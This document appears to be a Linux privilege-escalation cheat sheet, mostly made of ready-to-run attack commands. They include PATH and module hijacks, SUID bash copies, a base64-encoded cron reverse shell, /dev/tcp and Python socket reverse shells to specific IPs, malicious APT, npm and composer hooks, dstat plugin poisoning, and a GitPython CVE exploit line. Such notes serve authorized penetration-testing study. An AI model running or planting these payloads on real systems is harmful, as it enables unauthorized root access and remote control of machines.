Hijacks
When a script is executed with elevated privileges (e.g., via sudo
or in a cron
job) and calls other binaries or scripts with relative paths
, it may be possible to hijack the execution flow by manipulating the PATH
variable or exploiting relative paths.
echo $PATH
Hijacking Sudo
Permissions
sudo /usr/bin/php -r 'system("/bin/sh");'
Hijacking sudo
interactive shell
If there is a writable directory in the
$PATH
(e.g.,/tmp
or/home/user/
), and an attacker can control the contents of this directory.
cd /var/tmp && cp /bin/bash .
sudo -i
Path Hijacking sudo
Bash
echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/tokyo\nchown root:root /tmp/tokyo\nchmod 6777 /tmp/tokyo' | tee HIJACKED.sh
/tmp/tokyo -p
PHP
<?php
define('PATH', '/PATH/HIJACK');
system('cp /bin/bash /tmp/tokyo; chown root:root /tmp/tokyo; chmod 6777 /tmp/tokyo;');
?>
/tmp/tokyo -p
Path Hijacking cron
When
PATH
includes/usr/local/bin
before/usr/bin
in thecron
job's environment.When a binary or script is executed
without an absolute path
.
echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/tokyo\nchmod u+s /tmp/tokyo' > /usr/local/bin/TARGET; chmod +x /usr/local/bin/TARGET
bash
dropsSUID
privileges by default, so make sure to run it with-p
to keep root:
tokyo -p
PHP
$sock=fsockopen("10.10.16.8", 4445);
exec("/bin/sh -i <&3 >&3 2>&3");
<?php
$bashPath = '/bin/bash';
$tokyoPath = '/tmp/tokyo';
exec("cp $bashPath $tokyoPath");
exec("chmod u+s $tokyoPath");
exec("chmod +x $tokyoPath");
?>
Reverse shell template
echo "* * * * * root echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjAuMC4zLzcwMjAgMD4mMQo= | base64 -d | bash" > clean
echo "bash -i >& /dev/tcp/172.20.0.3/7020 0>&1" | base64
Path Hijacking supervisord.pid
Process management tool for keeping services running.
Each managed process must have a
[program:<name>]
line followed by another linecommand=
where you should place the payload.
echo -e "[program:memcached]\ncommand = bash -c 'bash -i >& /dev/tcp/LHOST/PORT 0>&1'" > memcached.ini
Path Hijacking Python
Python prioritize modules within the vulnerable script's directory, so you could place the malicious module there
python -c 'import sys; print "\n".join(sys.path)'
find /usr/lib/python* -type f -writable -ls 2>&1 | grep python
find /path/to/venv -type f -writable -ls 2>&1 | grep python
find -type f -writable -ls 2>&1 | grep python
import pty
pty.spawn("/bin/bash")
echo 'import pty
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.16.6",4444))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/bash")
s.close()' >> os.py
Path Hijacking symlink
ln -s /root/root.txt t.trace.db
tar wildcards
mv development{,.orig}
ln -s /root development
tar xvf file.tar.gz -C /tmp/
Sudoedit Double Wildcard Exploit
Using this exploit is possible to create a symbolic link pointing to the
authorized_keys
file.
mkdir tokyo
ln -s /home/alekos/.ssh/authorized_keys layout.html
sudoedit -u alekos /var/www/testing/tokyo/layout.html
TOCTOU - Time-To-Check-Time-of-Use
Is a type of race condition where a system checks a resourceโs state at one point in time but acts on that state later.
Between the check and the use, the resource can be altered by an attacker.
while true; do ln -sf /sensitive/file /tmp/vuln_link; done
The vulnerable script checks
/tmp/vuln_link
and then uses it, assuming it points to a safe file.
Conditional Logic and Environment Variables
In some cases, the vulnerable script uses additional logic or environment variables that affect whether the resource is read or acted upon after the initial check.
This can require more sophisticated exploitation, such as using a
double symlink
or toggling environment variables to bypass checks.
ln -s /safe/path /tmp/vuln_link
Step 2: Vulnerable script moves the symlink to quarantine after check
while true; do ln -sf /sensitive/file /var/quarantined/vuln_link; done
export CHECK_CONTENT=true
sudo vulnerable_script /tmp/vuln_link
Path Hijacking doas
doas
is a lightweight, simple command-line utility for running commands with elevated privileges on Unix-like systems, similar tosudo
.
doas.conf
have important information for privilege escalation:
find / -name "doas.conf" 2>/dev/null
Path Hijacking APT
Pre-Invoke
Create a malicious config file to be invoked before
APT
runs:
echo 'APT::Update::Pre-Invoke {"bash -c '\''bash -i >& /dev/tcp/192.168.0.10/4433 0>&1'\''"}' > file_name
APT
check this directory forpre-invoke
scripts:
/etc/apt/apt.conf.d
Just wait for listener.
npm
via
sudo
A
NodeJS
package is defined in a filepackage.json
, is possible to create a malicious package and run it with the--unsafe
option to get code execution:
{
"name": "root_please",
"version": "1.0.0",
"scripts": {
"preinstall": "/bin/bash"
}
}
The malicious
package.json
needs to be contain within the fake package directory; once is all setup just run it withsudo
:
sudo npm i package/ --unsafe
dstat
Plugin poisoning
Allows to run arbitrary python
scripts loaded as โexternal pluginsโ if they are located in one of the directories stated in the man
page:
~/.dstat/
(path of binary)/plugins/
/usr/share/dstat/
/usr/local/share/dstat
Normally to escalate privilege you want to choose the ones within the root
path, check for writable
permissions:
ls -ld /usr/local/share/dstat/
ls -ld /usr/share/dstat/
Create a malicious plugin:
echo -e 'import os\n\nos.system("/bin/bash")' > /usr/local/share/dstat/dstat_tokyo.py
echo 'import os; os.execv("/bin/sh", ["sh"])' > ~/.dstat/dstat_tokyo.py
Execute it with --PluginName
:
doas /usr/bin/dstat --tokyo
sudo dstat --tokyo
Composer
Hijacking
First create the temporal folder where you will invoke the shell from and save in an environmental variable:
TF=$(mktemp -d)
Once is done, create the malicious script to feed
composer
:
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
Finally, just execute the script with it's in-build option:
sudo composer --working-dir=$TF run-script x
GitPython
CVE-2022-24439
Inadequate validation of user input when handling remote URLs passed to the clone command:
echo "bash -i >& /dev/tcp/10.10.16.10/4444 0>&1" > /tmp/shell.sh
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c bash% /tmp/shell.sh'
Via Mosh
if It's possible to use /usr/bin/mosh-server
with sudo
privileges
sudo -u root /usr/bin/mosh-server 0.0.0.0
export MOSH_KEY=0NJo6yv0XHnF7Wrj8Y5pQ
mosh-client 127.0.0.1 60001
tcpdumb
via sudo
There is a GTFOBin entry for tcpdump
COMMAND='cp /bin/bash /tmp/tokyo; chmod 6777 /tmp/tokyo'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
Now, looking at the /tmp
folder, we see that we have successfully created a copy of /bin/bash
as /tmp/bash_root
/tmp/tokyo -p
Last updated